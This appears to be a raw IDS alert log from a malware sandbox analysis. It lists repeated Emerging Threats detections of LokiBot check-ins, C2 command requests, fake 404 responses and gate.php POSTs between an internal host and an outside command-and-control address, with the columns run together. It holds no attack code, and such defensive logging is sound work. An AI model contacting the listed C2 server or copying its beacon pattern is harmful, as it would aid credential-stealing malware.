                12/21/20-08:33:43.801180TCP2025483ET TROJAN LokiBot Fake 404 Response8049191185.193.143.118192.168.2.22
                12/21/20-08:33:44.096731TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919280192.168.2.22185.193.143.118
                12/21/20-08:33:44.096731TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919280192.168.2.22185.193.143.118
                12/21/20-08:33:44.096731TCP2025381ET TROJAN LokiBot Checkin4919280192.168.2.22185.193.143.118
                12/21/20-08:33:44.096731TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919280192.168.2.22185.193.143.118
                12/21/20-08:33:44.096731TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4919280192.168.2.22185.193.143.118
                12/21/20-08:33:44.293749TCP2025483ET TROJAN LokiBot Fake 404 Response8049192185.193.143.118192.168.2.22
                12/21/20-08:33:44.571159TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919380192.168.2.22185.193.143.118
                12/21/20-08:33:44.571159TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919380192.168.2.22185.193.143.118
                12/21/20-08:33:44.571159TCP2025381ET TROJAN LokiBot Checkin4919380192.168.2.22185.193.143.118
                12/21/20-08:33:44.571159TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919380192.168.2.22185.193.143.118
                12/21/20-08:33:44.571159TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4919380192.168.2.22185.193.143.118
                12/21/20-08:33:44.761158TCP2025483ET TROJAN LokiBot Fake 404 Response8049193185.193.143.118192.168.2.22
                12/21/20-08:33:45.056071TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919480192.168.2.22185.193.143.118
                12/21/20-08:33:45.056071TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919480192.168.2.22185.193.143.118
                12/21/20-08:33:45.056071TCP2025381ET TROJAN LokiBot Checkin4919480192.168.2.22185.193.143.118
                12/21/20-08:33:45.056071TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919480192.168.2.22185.193.143.118
                12/21/20-08:33:45.056071TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4919480192.168.2.22185.193.143.118
                12/21/20-08:33:45.256387TCP2025483ET TROJAN LokiBot Fake 404 Response8049194185.193.143.118192.168.2.22
                12/21/20-08:33:45.531713TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919580192.168.2.22185.193.143.118
                12/21/20-08:33:45.531713TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919580192.168.2.22185.193.143.118
                12/21/20-08:33:45.531713TCP2025381ET TROJAN LokiBot Checkin4919580192.168.2.22185.193.143.118
                12/21/20-08:33:45.531713TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919580192.168.2.22185.193.143.118
                12/21/20-08:33:45.531713TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4919580192.168.2.22185.193.143.118
                12/21/20-08:33:45.724094TCP2025483ET TROJAN LokiBot Fake 404 Response8049195185.193.143.118192.168.2.22
                12/21/20-08:33:46.000245TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919680192.168.2.22185.193.143.118
                12/21/20-08:33:46.000245TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919680192.168.2.22185.193.143.118
                12/21/20-08:33:46.000245TCP2025381ET TROJAN LokiBot Checkin4919680192.168.2.22185.193.143.118
                12/21/20-08:33:46.000245TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919680192.168.2.22185.193.143.118
                12/21/20-08:33:46.000245TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4919680192.168.2.22185.193.143.118
                12/21/20-08:33:46.197208TCP2025483ET TROJAN LokiBot Fake 404 Response8049196185.193.143.118192.168.2.22
                12/21/20-08:33:46.505912TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919780192.168.2.22185.193.143.118
                12/21/20-08:33:46.505912TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919780192.168.2.22185.193.143.118
                12/21/20-08:33:46.505912TCP2025381ET TROJAN LokiBot Checkin4919780192.168.2.22185.193.143.118
                12/21/20-08:33:46.505912TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919780192.168.2.22185.193.143.118
                12/21/20-08:33:46.505912TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4919780192.168.2.22185.193.143.118
                12/21/20-08:33:46.689478TCP2025483ET TROJAN LokiBot Fake 404 Response8049197185.193.143.118192.168.2.22
                12/21/20-08:33:46.952497TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919880192.168.2.22185.193.143.118
                12/21/20-08:33:46.952497TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919880192.168.2.22185.193.143.118
                12/21/20-08:33:46.952497TCP2025381ET TROJAN LokiBot Checkin4919880192.168.2.22185.193.143.118
                12/21/20-08:33:46.952497TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919880192.168.2.22185.193.143.118
                12/21/20-08:33:46.952497TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4919880192.168.2.22185.193.143.118
                12/21/20-08:33:47.145210TCP2025483ET TROJAN LokiBot Fake 404 Response8049198185.193.143.118192.168.2.22
                12/21/20-08:33:47.436852TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919980192.168.2.22185.193.143.118
                12/21/20-08:33:47.436852TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919980192.168.2.22185.193.143.118
                12/21/20-08:33:47.436852TCP2025381ET TROJAN LokiBot Checkin4919980192.168.2.22185.193.143.118
                12/21/20-08:33:47.436852TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919980192.168.2.22185.193.143.118
                12/21/20-08:33:47.436852TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4919980192.168.2.22185.193.143.118
                12/21/20-08:33:47.628328TCP2025483ET TROJAN LokiBot Fake 404 Response8049199185.193.143.118192.168.2.22
                12/21/20-08:33:47.907513TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920080192.168.2.22185.193.143.118
                12/21/20-08:33:47.907513TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920080192.168.2.22185.193.143.118
                12/21/20-08:33:47.907513TCP2025381ET TROJAN LokiBot Checkin4920080192.168.2.22185.193.143.118
                12/21/20-08:33:47.907513TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920080192.168.2.22185.193.143.118
                12/21/20-08:33:47.907513TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4920080192.168.2.22185.193.143.118
                12/21/20-08:33:48.102721TCP2025483ET TROJAN LokiBot Fake 404 Response8049200185.193.143.118192.168.2.22
                12/21/20-08:33:48.399306TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920180192.168.2.22185.193.143.118
                12/21/20-08:33:48.399306TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920180192.168.2.22185.193.143.118
                12/21/20-08:33:48.399306TCP2025381ET TROJAN LokiBot Checkin4920180192.168.2.22185.193.143.118
                12/21/20-08:33:48.399306TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920180192.168.2.22185.193.143.118
                12/21/20-08:33:48.399306TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4920180192.168.2.22185.193.143.118
                12/21/20-08:33:48.594541TCP2025483ET TROJAN LokiBot Fake 404 Response8049201185.193.143.118192.168.2.22
                12/21/20-08:33:48.868225TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920280192.168.2.22185.193.143.118
                12/21/20-08:33:48.868225TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920280192.168.2.22185.193.143.118
                12/21/20-08:33:48.868225TCP2025381ET TROJAN LokiBot Checkin4920280192.168.2.22185.193.143.118
                12/21/20-08:33:48.868225TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920280192.168.2.22185.193.143.118
                12/21/20-08:33:48.868225TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4920280192.168.2.22185.193.143.118
                12/21/20-08:33:49.054698TCP2025483ET TROJAN LokiBot Fake 404 Response8049202185.193.143.118192.168.2.22
                12/21/20-08:33:49.345744TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920380192.168.2.22185.193.143.118
                12/21/20-08:33:49.345744TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920380192.168.2.22185.193.143.118
                12/21/20-08:33:49.345744TCP2025381ET TROJAN LokiBot Checkin4920380192.168.2.22185.193.143.118
                12/21/20-08:33:49.345744TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920380192.168.2.22185.193.143.118
                12/21/20-08:33:49.345744TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4920380192.168.2.22185.193.143.118
                12/21/20-08:33:49.538415TCP2025483ET TROJAN LokiBot Fake 404 Response8049203185.193.143.118192.168.2.22
                12/21/20-08:33:49.842369TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920480192.168.2.22185.193.143.118
                12/21/20-08:33:49.842369TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920480192.168.2.22185.193.143.118
                12/21/20-08:33:49.842369TCP2025381ET TROJAN LokiBot Checkin4920480192.168.2.22185.193.143.118
                12/21/20-08:33:49.842369TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920480192.168.2.22185.193.143.118
                12/21/20-08:33:49.842369TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4920480192.168.2.22185.193.143.118
                12/21/20-08:33:50.024386TCP2025483ET TROJAN LokiBot Fake 404 Response8049204185.193.143.118192.168.2.22
                12/21/20-08:33:50.305218TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920580192.168.2.22185.193.143.118
                12/21/20-08:33:50.305218TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920580192.168.2.22185.193.143.118
                12/21/20-08:33:50.305218TCP2025381ET TROJAN LokiBot Checkin4920580192.168.2.22185.193.143.118
                12/21/20-08:33:50.305218TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920580192.168.2.22185.193.143.118
                12/21/20-08:33:50.305218TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4920580192.168.2.22185.193.143.118
                12/21/20-08:33:50.502685TCP2025483ET TROJAN LokiBot Fake 404 Response8049205185.193.143.118192.168.2.22
                12/21/20-08:33:50.800059TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920680192.168.2.22185.193.143.118
                12/21/20-08:33:50.800059TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920680192.168.2.22185.193.143.118
                12/21/20-08:33:50.800059TCP2025381ET TROJAN LokiBot Checkin4920680192.168.2.22185.193.143.118
                12/21/20-08:33:50.800059TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920680192.168.2.22185.193.143.118
                12/21/20-08:33:50.800059TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4920680192.168.2.22185.193.143.118
                12/21/20-08:33:50.995314TCP2025483ET TROJAN LokiBot Fake 404 Response8049206185.193.143.118192.168.2.22
                12/21/20-08:33:51.266644TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920780192.168.2.22185.193.143.118
                12/21/20-08:33:51.266644TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920780192.168.2.22185.193.143.118
                12/21/20-08:33:51.266644TCP2025381ET TROJAN LokiBot Checkin4920780192.168.2.22185.193.143.118
                12/21/20-08:33:51.266644TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920780192.168.2.22185.193.143.118
                12/21/20-08:33:51.266644TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4920780192.168.2.22185.193.143.118
                12/21/20-08:33:51.461716TCP2025483ET TROJAN LokiBot Fake 404 Response8049207185.193.143.118192.168.2.22
                12/21/20-08:33:51.729572TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920880192.168.2.22185.193.143.118
                12/21/20-08:33:51.729572TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920880192.168.2.22185.193.143.118
                12/21/20-08:33:51.729572TCP2025381ET TROJAN LokiBot Checkin4920880192.168.2.22185.193.143.118
                12/21/20-08:33:51.729572TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920880192.168.2.22185.193.143.118
                12/21/20-08:33:51.729572TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4920880192.168.2.22185.193.143.118
                12/21/20-08:33:51.917481TCP2025483ET TROJAN LokiBot Fake 404 Response8049208185.193.143.118192.168.2.22
                12/21/20-08:33:52.201845TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920980192.168.2.22185.193.143.118
                12/21/20-08:33:52.201845TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920980192.168.2.22185.193.143.118
                12/21/20-08:33:52.201845TCP2025381ET TROJAN LokiBot Checkin4920980192.168.2.22185.193.143.118
                12/21/20-08:33:52.201845TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920980192.168.2.22185.193.143.118
                12/21/20-08:33:52.201845TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4920980192.168.2.22185.193.143.118
                12/21/20-08:33:52.382859TCP2025483ET TROJAN LokiBot Fake 404 Response8049209185.193.143.118192.168.2.22
                12/21/20-08:33:52.681831TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921080192.168.2.22185.193.143.118
                12/21/20-08:33:52.681831TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921080192.168.2.22185.193.143.118
                12/21/20-08:33:52.681831TCP2025381ET TROJAN LokiBot Checkin4921080192.168.2.22185.193.143.118
                12/21/20-08:33:52.681831TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921080192.168.2.22185.193.143.118
                12/21/20-08:33:52.681831TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4921080192.168.2.22185.193.143.118
                12/21/20-08:33:52.881215TCP2025483ET TROJAN LokiBot Fake 404 Response8049210185.193.143.118192.168.2.22
                12/21/20-08:33:53.154706TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921180192.168.2.22185.193.143.118
                12/21/20-08:33:53.154706TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921180192.168.2.22185.193.143.118
                12/21/20-08:33:53.154706TCP2025381ET TROJAN LokiBot Checkin4921180192.168.2.22185.193.143.118
                12/21/20-08:33:53.154706TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921180192.168.2.22185.193.143.118
                12/21/20-08:33:53.154706TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4921180192.168.2.22185.193.143.118
                12/21/20-08:33:53.346194TCP2025483ET TROJAN LokiBot Fake 404 Response8049211185.193.143.118192.168.2.22
                12/21/20-08:33:53.619537TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921280192.168.2.22185.193.143.118
                12/21/20-08:33:53.619537TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921280192.168.2.22185.193.143.118
                12/21/20-08:33:53.619537TCP2025381ET TROJAN LokiBot Checkin4921280192.168.2.22185.193.143.118
                12/21/20-08:33:53.619537TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921280192.168.2.22185.193.143.118
                12/21/20-08:33:53.619537TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4921280192.168.2.22185.193.143.118
                12/21/20-08:33:53.817549TCP2025483ET TROJAN LokiBot Fake 404 Response8049212185.193.143.118192.168.2.22
                12/21/20-08:33:54.095934TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921380192.168.2.22185.193.143.118
                12/21/20-08:33:54.095934TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921380192.168.2.22185.193.143.118
                12/21/20-08:33:54.095934TCP2025381ET TROJAN LokiBot Checkin4921380192.168.2.22185.193.143.118
                12/21/20-08:33:54.095934TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921380192.168.2.22185.193.143.118
                12/21/20-08:33:54.095934TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4921380192.168.2.22185.193.143.118
                12/21/20-08:33:54.282756TCP2025483ET TROJAN LokiBot Fake 404 Response8049213185.193.143.118192.168.2.22
                12/21/20-08:33:54.563018TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921480192.168.2.22185.193.143.118
                12/21/20-08:33:54.563018TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921480192.168.2.22185.193.143.118
                12/21/20-08:33:54.563018TCP2025381ET TROJAN LokiBot Checkin4921480192.168.2.22185.193.143.118
                12/21/20-08:33:54.563018TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921480192.168.2.22185.193.143.118
                12/21/20-08:33:54.563018TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4921480192.168.2.22185.193.143.118
                12/21/20-08:33:54.753853TCP2025483ET TROJAN LokiBot Fake 404 Response8049214185.193.143.118192.168.2.22
                12/21/20-08:33:55.018163TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921580192.168.2.22185.193.143.118
                12/21/20-08:33:55.018163TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921580192.168.2.22185.193.143.118
                12/21/20-08:33:55.018163TCP2025381ET TROJAN LokiBot Checkin4921580192.168.2.22185.193.143.118
                12/21/20-08:33:55.018163TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921580192.168.2.22185.193.143.118
                12/21/20-08:33:55.018163TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4921580192.168.2.22185.193.143.118
                12/21/20-08:33:55.203334TCP2025483ET TROJAN LokiBot Fake 404 Response8049215185.193.143.118192.168.2.22
                12/21/20-08:33:55.468060TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921680192.168.2.22185.193.143.118
                12/21/20-08:33:55.468060TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921680192.168.2.22185.193.143.118
                12/21/20-08:33:55.468060TCP2025381ET TROJAN LokiBot Checkin4921680192.168.2.22185.193.143.118
                12/21/20-08:33:55.468060TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921680192.168.2.22185.193.143.118
                12/21/20-08:33:55.468060TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4921680192.168.2.22185.193.143.118
                12/21/20-08:33:57.629525TCP2025483ET TROJAN LokiBot Fake 404 Response8049216185.193.143.118192.168.2.22
                12/21/20-08:33:58.210023TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921780192.168.2.22185.193.143.118
                12/21/20-08:33:58.210023TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921780192.168.2.22185.193.143.118
                12/21/20-08:33:58.210023TCP2025381ET TROJAN LokiBot Checkin4921780192.168.2.22185.193.143.118
                12/21/20-08:33:58.210023TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921780192.168.2.22185.193.143.118
                12/21/20-08:33:58.210023TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4921780192.168.2.22185.193.143.118
                12/21/20-08:33:58.403531TCP2025483ET TROJAN LokiBot Fake 404 Response8049217185.193.143.118192.168.2.22
                12/21/20-08:33:58.669352TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921880192.168.2.22185.193.143.118
                12/21/20-08:33:58.669352TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921880192.168.2.22185.193.143.118
                12/21/20-08:33:58.669352TCP2025381ET TROJAN LokiBot Checkin4921880192.168.2.22185.193.143.118
                12/21/20-08:33:58.669352TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921880192.168.2.22185.193.143.118
                12/21/20-08:33:58.669352TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4921880192.168.2.22185.193.143.118
                12/21/20-08:33:58.864827TCP2025483ET TROJAN LokiBot Fake 404 Response8049218185.193.143.118192.168.2.22
                12/21/20-08:33:59.144565TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921980192.168.2.22185.193.143.118
                12/21/20-08:33:59.144565TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921980192.168.2.22185.193.143.118
                12/21/20-08:33:59.144565TCP2025381ET TROJAN LokiBot Checkin4921980192.168.2.22185.193.143.118
                12/21/20-08:33:59.144565TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921980192.168.2.22185.193.143.118
                12/21/20-08:33:59.144565TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4921980192.168.2.22185.193.143.118
                12/21/20-08:33:59.334280TCP2025483ET TROJAN LokiBot Fake 404 Response8049219185.193.143.118192.168.2.22
                12/21/20-08:33:59.604248TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922080192.168.2.22185.193.143.118
                12/21/20-08:33:59.604248TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922080192.168.2.22185.193.143.118
                12/21/20-08:33:59.604248TCP2025381ET TROJAN LokiBot Checkin4922080192.168.2.22185.193.143.118
                12/21/20-08:33:59.604248TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922080192.168.2.22185.193.143.118
                12/21/20-08:33:59.604248TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4922080192.168.2.22185.193.143.118
                12/21/20-08:33:59.791795TCP2025483ET TROJAN LokiBot Fake 404 Response8049220185.193.143.118192.168.2.22
                12/21/20-08:34:00.066546TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922180192.168.2.22185.193.143.118
                12/21/20-08:34:00.066546TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922180192.168.2.22185.193.143.118
                12/21/20-08:34:00.066546TCP2025381ET TROJAN LokiBot Checkin4922180192.168.2.22185.193.143.118
                12/21/20-08:34:00.066546TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922180192.168.2.22185.193.143.118
                12/21/20-08:34:00.066546TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4922180192.168.2.22185.193.143.118
                12/21/20-08:34:00.256095TCP2025483ET TROJAN LokiBot Fake 404 Response8049221185.193.143.118192.168.2.22
                12/21/20-08:34:00.524930TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922280192.168.2.22185.193.143.118
                12/21/20-08:34:00.524930TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922280192.168.2.22185.193.143.118
                12/21/20-08:34:00.524930TCP2025381ET TROJAN LokiBot Checkin4922280192.168.2.22185.193.143.118
                12/21/20-08:34:00.524930TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922280192.168.2.22185.193.143.118
                12/21/20-08:34:00.524930TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4922280192.168.2.22185.193.143.118
                12/21/20-08:34:00.710942TCP2025483ET TROJAN LokiBot Fake 404 Response8049222185.193.143.118192.168.2.22
                12/21/20-08:34:00.993901TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922380192.168.2.22185.193.143.118
                12/21/20-08:34:00.993901TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922380192.168.2.22185.193.143.118
                12/21/20-08:34:00.993901TCP2025381ET TROJAN LokiBot Checkin4922380192.168.2.22185.193.143.118
                12/21/20-08:34:00.993901TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922380192.168.2.22185.193.143.118
                12/21/20-08:34:00.993901TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4922380192.168.2.22185.193.143.118
                12/21/20-08:34:01.177423TCP2025483ET TROJAN LokiBot Fake 404 Response8049223185.193.143.118192.168.2.22
                12/21/20-08:34:01.452554TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922480192.168.2.22185.193.143.118
                12/21/20-08:34:01.452554TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922480192.168.2.22185.193.143.118
                12/21/20-08:34:01.452554TCP2025381ET TROJAN LokiBot Checkin4922480192.168.2.22185.193.143.118
                12/21/20-08:34:01.452554TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922480192.168.2.22185.193.143.118
                12/21/20-08:34:01.452554TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4922480192.168.2.22185.193.143.118
                12/21/20-08:34:01.638469TCP2025483ET TROJAN LokiBot Fake 404 Response8049224185.193.143.118192.168.2.22
                12/21/20-08:34:01.876667TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922580192.168.2.22185.193.143.118
                12/21/20-08:34:01.876667TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922580192.168.2.22185.193.143.118
                12/21/20-08:34:01.876667TCP2025381ET TROJAN LokiBot Checkin4922580192.168.2.22185.193.143.118
                12/21/20-08:34:01.876667TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922580192.168.2.22185.193.143.118
                12/21/20-08:34:01.876667TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4922580192.168.2.22185.193.143.118
                12/21/20-08:34:02.059926TCP2025483ET TROJAN LokiBot Fake 404 Response8049225185.193.143.118192.168.2.22
                12/21/20-08:34:02.621823TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922680192.168.2.22185.193.143.118
                12/21/20-08:34:02.621823TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922680192.168.2.22185.193.143.118
                12/21/20-08:34:02.621823TCP2025381ET TROJAN LokiBot Checkin4922680192.168.2.22185.193.143.118
                12/21/20-08:34:02.621823TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922680192.168.2.22185.193.143.118
                12/21/20-08:34:02.621823TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4922680192.168.2.22185.193.143.118
                12/21/20-08:34:02.813173TCP2025483ET TROJAN LokiBot Fake 404 Response8049226185.193.143.118192.168.2.22
                12/21/20-08:34:03.371544TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922780192.168.2.22185.193.143.118
                12/21/20-08:34:03.371544TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922780192.168.2.22185.193.143.118
                12/21/20-08:34:03.371544TCP2025381ET TROJAN LokiBot Checkin4922780192.168.2.22185.193.143.118
                12/21/20-08:34:03.371544TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922780192.168.2.22185.193.143.118
                12/21/20-08:34:03.371544TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4922780192.168.2.22185.193.143.118
                12/21/20-08:34:03.553006TCP2025483ET TROJAN LokiBot Fake 404 Response8049227185.193.143.118192.168.2.22
                12/21/20-08:34:03.833935TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922880192.168.2.22185.193.143.118
                12/21/20-08:34:03.833935TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922880192.168.2.22185.193.143.118
                12/21/20-08:34:03.833935TCP2025381ET TROJAN LokiBot Checkin4922880192.168.2.22185.193.143.118
                12/21/20-08:34:03.833935TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922880192.168.2.22185.193.143.118
                12/21/20-08:34:03.833935TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4922880192.168.2.22185.193.143.118
                12/21/20-08:34:04.038430TCP2025483ET TROJAN LokiBot Fake 404 Response8049228185.193.143.118192.168.2.22
                12/21/20-08:34:04.292102TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922980192.168.2.22185.193.143.118
                12/21/20-08:34:04.292102TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922980192.168.2.22185.193.143.118
                12/21/20-08:34:04.292102TCP2025381ET TROJAN LokiBot Checkin4922980192.168.2.22185.193.143.118
                12/21/20-08:34:04.292102TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922980192.168.2.22185.193.143.118
                12/21/20-08:34:04.292102TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4922980192.168.2.22185.193.143.118
                12/21/20-08:34:04.473880TCP2025483ET TROJAN LokiBot Fake 404 Response8049229185.193.143.118192.168.2.22
                12/21/20-08:34:04.727065TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923080192.168.2.22185.193.143.118
                12/21/20-08:34:04.727065TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923080192.168.2.22185.193.143.118
                12/21/20-08:34:04.727065TCP2025381ET TROJAN LokiBot Checkin4923080192.168.2.22185.193.143.118
                12/21/20-08:34:04.727065TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923080192.168.2.22185.193.143.118
                12/21/20-08:34:04.727065TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4923080192.168.2.22185.193.143.118
                12/21/20-08:34:04.906800TCP2025483ET TROJAN LokiBot Fake 404 Response8049230185.193.143.118192.168.2.22
                12/21/20-08:34:05.184515TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923180192.168.2.22185.193.143.118
                12/21/20-08:34:05.184515TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923180192.168.2.22185.193.143.118
                12/21/20-08:34:05.184515TCP2025381ET TROJAN LokiBot Checkin4923180192.168.2.22185.193.143.118
                12/21/20-08:34:05.184515TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923180192.168.2.22185.193.143.118
                12/21/20-08:34:05.184515TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4923180192.168.2.22185.193.143.118
                12/21/20-08:34:05.370030TCP2025483ET TROJAN LokiBot Fake 404 Response8049231185.193.143.118192.168.2.22
